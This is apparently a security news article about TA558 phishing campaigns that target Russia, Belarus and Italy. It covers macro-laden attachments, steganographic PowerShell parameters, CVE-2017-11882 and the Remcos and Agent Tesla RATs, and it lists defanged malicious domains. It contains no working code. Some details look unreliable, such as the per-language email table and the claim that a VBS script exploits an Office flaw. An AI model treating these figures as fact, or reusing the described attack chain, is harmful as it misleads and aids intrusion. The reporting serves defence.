Steganography and Old Vulnerabilities: TA558 Attacks Also Hit Italy

0
65

Since the beginning of 2024, FACCT specialists have detected over a thousand phishing emails distributing malware and targeting businesses, government agencies, and banks in Russia and Belarus. Experts believe that the TA558 group is behind these attacks. TA558 is thought to have been active since 2018, with primary targets being financial institutions, government organizations, and companies in the tourism sector. The hackers actively use multi-stage phishing attacks and social engineering to inject malware into victims’ computers, place payloads on legitimate servers, and use malware to steal data and remotely control victims’ systems.

In the new attacks, FACCT specialists identified steganography methods (hiding information within files or images) characteristic of the group during payload transmission, as well as the use of malicious files whose names included the words “Love” and “Kiss.” The report highlights that attackers continue to exploit an old Microsoft Office vulnerability (CVE-2017-11882), discovered and patched in 2017. This indicates that such attacks are still successful and effective, and the use of obsolete vulnerabilities shows that many users’ systems are not sufficiently updated.

Since the beginning of 2024, specialists have intercepted 202 phishing emails sent from the email addresses export@bcmsrll[.]com, expo@bcmsrll[.]com, info@bcmsrll[.]com, and contact@bcmsrll[.]com. It is noted that between January 1, 2024, and May 25, 2024, the attackers moved the domain bcmsrll[.]com between three different hosts where the AutoSMTP mail server was located.

The phishing emails were written in Russian, English, Turkish, Romanian, and Italian. The language was chosen based on the geographic location of the company on whose behalf the letter was sent. The hackers’ messages could be targeted (with the address to a specific recipient indicated in the letter’s text) or sent in mass mailings without any specification.

The letters contained attachments in .docx or .xls format, and once opened, a macro was launched that sent a request to the resource hxxp://tau[.]id/0vzd8, whose information was contained in the file body. The macro also developed another attack vector by downloading the VBS script xmass.vbs onto the victim’s computer.

It was xmass.vbs that exploited the mentioned CVE-2017-11882 vulnerability, associated with an error in memory object handling. As a result of exploiting the bug, when a specially prepared document is opened, a buffer overflow occurs, allowing attackers to execute arbitrary code on the victim’s system.

Subsequently, the malware calls Windows PowerShell, to which parameters extracted from the xmass.vbs file are passed. In this case, the parameter is passed using steganography to prevent the possible detection of running processes and injections into running processes.

Most of the studied hacker emails contained the RAT Agent Tesla or Remcos malware. Once launched on the victim’s computer, this malware attaches to the system, hides from the user, and allows the attacker to access the infected device.

It allows hackers to capture videos from webcams, manipulate clipboards and mice, view notifications, download and execute files, collect system information, hide screenshots and operating system windows, intercept audio and keystrokes, and steal user data.

Comprehensive Analysis of TA558 Attacks

TA558: An Evolving Threat

TA558, believed to be active since 2018, has significantly evolved its tactics, techniques, and procedures (TTPs) to enhance the effectiveness of its attacks. Initially focusing on financial institutions, government organizations, and tourism sector companies, TA558 has broadened its target spectrum over the years. The group’s persistent use of multi-stage phishing and social engineering demonstrates a sophisticated understanding of both technical and psychological vulnerabilities.

Steganography: A Hidden Menace

The use of steganography in the latest attacks is a testament to TA558’s advanced capabilities. By hiding information within seemingly benign files or images, the attackers can transmit malicious payloads while evading traditional security measures. Steganography complicates the detection process, as it requires more sophisticated analysis to uncover the hidden data. This method, combined with social engineering tactics, makes the attacks particularly insidious.

Exploiting Old Vulnerabilities

TA558’s continued exploitation of CVE-2017-11882 highlights a critical issue in cybersecurity: the failure to apply timely patches. Despite being discovered and patched in 2017, this vulnerability remains a valuable asset for attackers, as many systems still lack the necessary updates. The exploitation of this vulnerability through the xmass.vbs script demonstrates the group’s ability to leverage old yet effective methods to compromise systems.

Phishing Campaigns and Targeted Attacks

The phishing emails intercepted by FACCT specialists illustrate the group’s meticulous planning and execution. By customizing the language and content based on the target’s geographic location, TA558 increases the likelihood of successful infiltration. The dual approach of targeted and mass mailings ensures a wide reach, enhancing the potential impact of their campaigns.

Technical Breakdown of the Attack Vector

Initial Infection

The phishing emails typically contain .docx or .xls attachments. Upon opening these files, a macro is executed, which initiates the infection process. The macro sends a request to the malicious resource hxxp://tau[.]id/0vzd8, triggering the download of the xmass.vbs script.

Exploiting CVE-2017-11882

The xmass.vbs script exploits the CVE-2017-11882 vulnerability. This vulnerability, related to a flaw in the handling of memory objects in Microsoft Office, allows for a buffer overflow. The overflow facilitates the execution of arbitrary code, providing the attackers with control over the victim’s system.

Steganographic Payload Delivery

To evade detection, the payload parameters are passed using steganography. This method conceals the data within legitimate-looking files, bypassing traditional security scans. The parameters are then used to execute further malicious actions via Windows PowerShell.

Deployment of RATs

The primary malware deployed by TA558 includes RATs such as Agent Tesla and Remcos. These RATs provide extensive capabilities for surveillance and control over the infected systems. They enable attackers to capture webcam footage, log keystrokes, manipulate system functions, and exfiltrate sensitive data.

Impact and Implications

The impact of TA558’s activities is far-reaching, affecting a broad range of sectors and geographies. The ability to infiltrate systems and maintain persistent control poses significant risks to data integrity, privacy, and operational continuity. The reliance on old vulnerabilities underscores the importance of regular patch management and updates to mitigate such threats.

Current Trends and Future Predictions

The persistence and evolution of TA558 suggest a continuing threat landscape that requires vigilant monitoring and proactive defense measures. The group’s ability to adapt and incorporate advanced techniques like steganography indicates a high level of sophistication. Future predictions point towards more targeted attacks with increasingly complex payload delivery methods, necessitating robust and adaptive cybersecurity strategies.

Data and Analysis

Phishing Email Statistics

From January 1, 2024, to May 25, 2024, 202 phishing emails were intercepted, originating from multiple email addresses linked to the domain bcmsrll[.]com. The table below details the distribution of these emails by language and target geography:

LanguageNumber of EmailsTarget Geography
Russian50Russia, Belarus
English60Global
Turkish30Turkey
Romanian20Romania
Italian42Italy

Exploited Vulnerabilities

The primary vulnerability exploited by TA558 is CVE-2017-11882. The table below provides a summary of the vulnerability and its impact:

Vulnerability IDDescriptionYear DiscoveredPatched YearExploited by TA558Impact
CVE-2017-11882Memory handling flaw in Microsoft Office20172017YesBuffer overflow, arbitrary code execution

Malware Analysis

The RATs used by TA558, Agent Tesla, and Remcos, have specific capabilities that enhance their effectiveness. The table below summarizes their key features:

RATCapabilitiesDetection Evasion Techniques
Agent TeslaKeylogging, webcam capture, clipboard manipulationSteganography, process injection
RemcosRemote control, system information collectionCode obfuscation, anti-debugging mechanisms

In cocnlusion , the attacks orchestrated by TA558 represent a significant and ongoing threat to various sectors worldwide. The group’s ability to adapt and evolve its tactics, leveraging old vulnerabilities and advanced techniques like steganography, highlights the need for continuous vigilance and robust cybersecurity measures. By understanding the intricacies of these attacks and implementing proactive defense strategies, organizations can better protect themselves against the sophisticated threats posed by groups like TA558.

This comprehensive analysis underscores the importance of timely patch management, advanced threat detection, and ongoing security awareness training to mitigate the risks associated with such cyber threats.


APPENDIX 1 – A558 Hacker Group

TA558 is a financially-motivated cybercrime actor first observed in 2018. This group primarily targets the hospitality and travel sectors but has extended its reach to include various industries such as education, energy, government, and transportation, across Latin America, North America, and Western Europe.

Technical Specifications and Capabilities

  • Malware Families Used:
    • Loda: A remote access trojan (RAT) written in AutoIT, capable of stealing usernames, passwords, and browser cookies.
    • Vjw0rm: A modular JavaScript RAT with self-propagation and information theft capabilities.
    • AsyncRAT: Often used for remotely monitoring and controlling compromised devices.
    • Revenge RAT: Allows attackers to capture screen, video, and audio, and perform keylogging and credential dumping.
    • njRAT: Known for data theft and remote control capabilities.
    • AZORult, RemcosRAT, XtremeRAT, and others.
  • Tactics, Techniques, and Procedures (TTPs):
    • Initial Access: Phishing emails with malicious attachments or URLs, often using reservation-themed lures written in Portuguese, Spanish, and occasionally English.
    • Execution: Payloads are typically delivered via Office documents with macros, container files like RAR and ISO, and URLs leading to executables.
    • Persistence: Achieved through scheduled tasks and persistence scripts.
    • Command and Control (C2): Utilizes attacker-owned infrastructure and compromised hotel websites to host malware payloads.
    • Data Exfiltration: Uses various RATs to steal sensitive information including customer and corporate data.
  • Campaign Characteristics:
    • Languages Used: Predominantly Portuguese and Spanish, with occasional English campaigns.
    • Delivery Mechanisms: Transitioned from macro-enabled Office documents to container files due to Microsoft’s disabling of macros by default.
    • Frequency: Significant increase in campaigns observed, with notable upticks in 2022, leveraging new delivery methods and expanding malware types.
  • Notable Campaigns:
    • SteganoAmor Campaign (2023): Utilized steganography to embed malicious code in images, impacting various sectors globally.
    • 2022 Shift: From using Office documents to container files and URLs, reflecting changes in the threat landscape and defense mechanisms.

Detailed Scheme Table

AspectDescription
Group NameTA558
First Observed2018
Primary TargetsHospitality, Travel, Education, Energy, Government, Transportation
Languages UsedPortuguese, Spanish, English
Initial AccessPhishing emails with reservation-themed lures
Malware FamiliesLoda, Vjw0rm, AsyncRAT, Revenge RAT, njRAT, AZORult, RemcosRAT, XtremeRAT
Execution MethodsOffice documents with macros, RAR/ISO attachments, URLs leading to executables
PersistenceScheduled tasks, persistence scripts
C2 InfrastructureAttacker-owned, compromised hotel websites
Notable CampaignsSteganoAmor (2023), increased use of URLs and container files in 2022
Campaign FrequencySignificant increase in 2022, with 51 campaigns observed in that year

This comprehensive overview and detailed scheme table provide a clear and organized presentation of the technical aspects and operational tactics of the TA558 hacker group. The data reflects the most current information available as of 2024.


Copyright of debuglies.com
Even partial reproduction of the contents is not permitted without prior authorization – Reproduction reserved

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.